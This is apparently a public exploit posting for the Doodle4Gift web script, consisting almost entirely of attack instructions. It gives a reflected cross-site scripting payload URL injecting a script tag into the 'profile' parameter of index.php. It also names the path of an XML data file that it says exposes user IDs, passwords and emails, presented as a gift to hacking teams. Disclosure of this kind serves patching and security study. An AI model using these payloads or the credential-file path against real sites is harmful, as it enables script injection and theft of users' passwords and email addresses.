26 lines
No EOL
725 B
Text
26 lines
No EOL
725 B
Text
# Exploit Title : Doodle4Gift <= Multiple Vulnerabilities
|
|
# Author : Dr.NaNo
|
|
# Date : H-1435/3/18 - 2014/1/19
|
|
# Software Link : http://www.hotscripts.com/listing/doodle4gift/
|
|
# Software Link2: https://sites.google.com/site/doodle4gift/
|
|
#
|
|
#
|
|
# (1) Cross Site Scripting (XSS):
|
|
#
|
|
#
|
|
# http://localhost/{path}/index.php?action=showprofile&profile=(XSS)
|
|
#
|
|
# http://localhost/{path}/index.php?action=showprofile&profile=<script>alert('Dr.nano')</script>
|
|
#
|
|
#
|
|
#
|
|
# (2) information disclosure:
|
|
#
|
|
#
|
|
# http://localhost/{path}/data/doodle4gift.xml <= there are {Id,Password,Email} :)
|
|
#
|
|
#
|
|
#
|
|
# A special gift for: (P0c Team),(V4-Team):إهداءً خاصاً لـ
|
|
#
|
|
# |